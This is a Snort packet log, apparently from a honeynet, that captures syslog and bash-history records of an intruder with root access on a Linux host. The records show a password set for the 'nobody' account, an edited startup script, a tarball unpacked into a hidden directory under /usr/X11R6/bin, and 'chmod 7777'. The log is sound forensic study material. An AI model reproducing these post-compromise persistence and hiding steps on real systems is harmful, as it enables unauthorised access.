0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17910 IpLen:20 DgmLen:60 DF ******S* Seq: 0x896434DF Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 237685474 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.133586 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2611 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x8EBB9398 Ack: 0x896434E0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 29931024 237685474 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.191972 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17921 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x896434E0 Ack: 0x8EBB9399 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685484 29931024 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.193145 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17922 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x896434E0 Ack: 0x8EBB9399 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685484 29931024 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.195491 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2621 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8EBB9399 Ack: 0x896434E1 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 29931029 237685484 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.972333 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2750 IpLen:20 DgmLen:91 Len: 71 3C 33 37 3E 72 73 68 64 5B 38 36 38 33 5D 3A 20 <37>rshd[8683]: 43 6F 6E 6E 65 63 74 69 6F 6E 20 66 72 6F 6D 20 Connection from 32 30 37 2E 33 35 2E 32 35 31 2E 31 37 32 20 6F 207.35.251.172 o 6E 20 69 6C 6C 65 67 61 6C 20 70 6F 72 74 0A n illegal port. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.975528 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2751 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x8EBB9399 Ack: 0x896434E1 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 29931085 237685484 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.982540 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2752 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 33 3A 20 65 78 69 74 20 73 pid 8683: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:51.046424 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:18078 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x896434E1 Ack: 0x8EBB939A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685567 29931085 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:54.747308 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:3410 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 38 36 38 34 <30>telnetd[8684 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:54.760415 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:3412 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 34 3A 20 65 78 69 74 20 73 pid 8684: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:13.632185 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6355 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 38 36 38 35 5D 3A 20 <94>ftpd[8685]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:16.348693 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6800 IpLen:20 DgmLen:94 Len: 74 3C 33 37 3E 72 6C 6F 67 69 6E 64 5B 38 36 38 36 <37>rlogind[8686 5D 3A 20 43 6F 6E 6E 65 63 74 69 6F 6E 20 66 72 ]: Connection fr 6F 6D 20 32 30 37 2E 33 35 2E 32 35 31 2E 31 37 om 207.35.251.17 32 20 6F 6E 20 69 6C 6C 65 67 61 6C 20 70 6F 72 2 on illegal por 74 0A t. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:16.389568 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6826 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 36 3A 20 65 78 69 74 20 73 pid 8686: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:46:03.395935 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12646 IpLen:20 DgmLen:84 Len: 64 3C 32 37 3E 66 69 6E 67 65 72 64 5B 38 36 39 30 <27>fingerd[8690 5D 3A 20 43 6C 69 65 6E 74 20 68 75 6E 67 20 75 ]: Client hung u 70 20 2D 20 70 72 6F 62 61 62 6C 65 20 70 6F 72 p - probable por 74 2D 73 63 61 6E 20 0A t-scan . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:46:03.406662 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12649 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 39 30 3A 20 65 78 69 74 20 73 pid 8690: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:47:17.093310 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12682 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 2E 2F 47 6F 20 32 34 0A =0 ./Go 24. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:52:18.847107 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12882 IpLen:20 DgmLen:64 Len: 44 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 77 0A 0 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:52:26.282344 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12896 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 77 68 6F 61 6D 69 0A 0 whoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:54:55.165873 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12903 IpLen:20 DgmLen:81 Len: 61 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 36 <38>PAM_pwdb[866 31 5D 3A 20 28 73 75 29 20 73 65 73 73 69 6F 6E 1]: (su) session 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 73 65 72 closed for user 20 64 6E 73 0A dns. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:00.544559 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12907 IpLen:20 DgmLen:87 Len: 67 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 34 <38>PAM_pwdb[864 35 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 5]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 6E 6F 62 6F 64 79 0A ser nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:01.711311 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12913 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 34 34 3A 20 65 78 69 74 20 73 pid 8644: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:06.620777 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12937 IpLen:20 DgmLen:78 Len: 58 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2F 64 65 76 2F 72 64 2F 73 64 63 0 cd /dev/rd/sdc 30 0A 0. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:08.509045 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12941 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:18.561679 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12953 IpLen:20 DgmLen:77 Len: 57 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 72 6D 20 5A 65 72 30 2E 74 61 72 2E 67 7A 0 rm Zer0.tar.gz 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:21.207608 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12961 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:54.291751 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13026 IpLen:20 DgmLen:84 Len: 64 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 61 6C 69 61 73 20 6C 73 3D 27 6C 73 20 2D 0 alias ls='ls - 2D 63 6F 6C 6F 72 27 0A -color'. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:56.748349 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13030 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:23.243036 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13069 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:23.243807 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13070 IpLen:20 DgmLen:76 Len: 56 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 61 73 73 77 64 20 6E 6F 62 6F 64 79 0A 0 passwd nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:40.942483 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13092 IpLen:20 DgmLen:95 Len: 75 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 36 5D 3A 20 70 61 73 73 77 6F 72 64 20 66 6F 72 6]: password for 20 28 6E 6F 62 6F 64 79 2F 39 39 29 20 63 68 61 (nobody/99) cha 6E 67 65 64 20 62 79 20 28 28 6E 75 6C 6C 29 2F nged by ((null)/ 30 29 0A 0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:02.773268 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13122 IpLen:20 DgmLen:96 Len: 76 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 39 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 9]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 75 75 63 70 20 62 79 20 28 75 69 64 ser uucp by (uid 3D 30 29 0A =0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:28.867924 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13126 IpLen:20 DgmLen:85 Len: 65 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 39 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 9]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 75 75 63 70 0A ser uucp. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:28.899975 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13128 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 39 34 30 38 3A 20 65 78 69 74 20 73 pid 9408: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:01:22.769990 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13163 IpLen:20 DgmLen:81 Len: 61 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 69 6E 67 20 77 77 77 2E 79 61 68 6F 6F 0 ping www.yahoo 2E 63 6F 6D 0A .com. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:02.741510 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13197 IpLen:20 DgmLen:91 Len: 71 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 69 63 6F 20 2F 65 74 63 2F 72 63 2E 64 0 pico /etc/rc.d 2F 72 63 33 2E 64 2F 53 35 30 69 6E 65 74 0A /rc3.d/S50inet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:18.309588 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13237 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:42.974762 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13288 IpLen:20 DgmLen:101 Len: 81 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6D 76 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 mv copy.tar.gz 20 2F 75 73 72 2F 58 31 31 52 36 2F 62 69 6E 2F /usr/X11R6/bin/ 2E 2C 2F 63 6F 70 79 2F 0A .,/copy/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:56.827304 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13299 IpLen:20 DgmLen:89 Len: 69 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2F 75 73 72 2F 58 31 31 52 36 2F 0 cd /usr/X11R6/ 62 69 6E 2F 2E 2C 2F 63 6F 70 79 2F 0A bin/.,/copy/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:07.875878 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13337 IpLen:20 DgmLen:81 Len: 61 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6D 76 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 mv copy.tar.gz 20 2E 2E 2F 0A ../. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:09.522064 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13345 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:14.609409 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13359 IpLen:20 DgmLen:68 Len: 48 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2E 2E 0A 0 cd ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:20.255901 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13379 IpLen:20 DgmLen:83 Len: 63 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 74 61 72 20 7A 78 76 66 20 63 6F 70 79 2E 0 tar zxvf copy. 74 61 72 2E 67 7A 0A tar.gz. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:03.777359 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13426 IpLen:20 DgmLen:75 Len: 55 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 68 6D 6F 64 20 37 37 37 37 20 2A 0A 0 chmod 7777 *. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:05.901249 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13434 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:18.792918 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13474 IpLen:20 DgmLen:77 Len: 57 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 72 6D 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 rm copy.tar.gz 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:21.369867 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13488 IpLen:20 DgmLen:70 Len: 50 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 63 6F 70 79 0A 0 cd copy. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:25.912240 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13499 IpLen:20 DgmLen:75 Len: 55 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 68 6D 6F 64 20 37 37 37 37 20 2A 0A 0 chmod 7777 *. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:28.350149 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13505 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:07:33.792486 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13546 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 34 34 30 20 55 49 44 3D Y: PID=9440 UID= 30 20 75 6E 61 6D 65 20 2D 72 0A 0 uname -r. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:07:58.732757 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13577 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 34 34 30 20 55 49 44 3D Y: PID=9440 UID= 30 20 70 73 74 72 65 65 0A 0 pstree. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 92 packets. Breakdown by protocol: Action Stats: TCP: 7 (7.609%) ALERTS: 0 UDP: 85 (92.391%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP 